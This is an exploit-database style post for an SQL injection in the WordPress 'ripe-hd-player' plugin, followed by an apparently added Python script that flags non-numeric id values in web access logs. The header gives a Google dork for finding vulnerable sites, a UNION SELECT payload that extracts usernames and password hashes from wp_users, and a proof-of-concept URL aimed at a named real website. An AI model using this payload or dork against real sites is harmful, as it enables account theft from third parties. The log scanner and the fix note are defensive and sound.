# Exploit Title: ripe-hd-player SQL-Inj
# Date: 19.10.2012
# Exploit Author: ukrpunk
# Vendor Homepage: find by yourself
# Software Link: find by yourself
# Version: don't know
# Tested in: web
# Dork: inurl:"/plugins/ripe-hd-player"
# Exploit: -1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_users--
# PoC: http://www.fitness-bucuresti.ro/wp-content/plugins/ripe-hd-player/config.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_users--
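For site owners checking whether this plugin endpoint has been probed, the following is an added example (not part of the original post and not the plugin's code) that scans web access logs for non-numeric `id` values sent to the plugin path. It assumes Combined Log Format and that a legitimate `id` is a plain non-negative integer; the log lines and client addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; addresses are documentation-range placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Oct/2012:10:00:01 +0000] "GET /wp-content/plugins/ripe-hd-player/config.php?id=3 HTTP/1.1" 200 512',
    '203.0.113.9 - - [19/Oct/2012:10:00:05 +0000] "GET /wp-content/plugins/ripe-hd-player/config.php?id=-1+union+select+1,2+from+wp_users-- HTTP/1.1" 200 2048',
    '203.0.113.9 - - [19/Oct/2012:10:00:09 +0000] "GET /wp-content/plugins/ripe-hd-player/config.php?id=-1%20UNION%20SELECT%201 HTTP/1.1" 200 2048',
    '203.0.113.4 - - [19/Oct/2012:10:00:12 +0000] "GET /index.php?id=abc HTTP/1.1" 200 100',
]

# Client address and request target from a Common/Combined Log Format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PLUGIN_PATH = "/plugins/ripe-hd-player/"


def is_valid_id(value):
    """Allow-list check: assumes a legitimate id is 1-10 decimal digits."""
    return re.fullmatch(r"\d{1,10}", value) is not None


def suspicious_requests(lines):
    """Return (client, decoded id) for plugin requests whose id is not numeric."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, target = m.groups()
        url = urlsplit(target)
        if PLUGIN_PATH not in url.path:
            continue  # only the plugin endpoint is in scope here
        # parse_qs decodes both '+' and %20, so encoding variants normalise.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not is_valid_id(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-numeric id: {value!r}")
```

The same allow-list applied server-side (casting `id` to an integer or binding it in a prepared statement) removes the injection point itself.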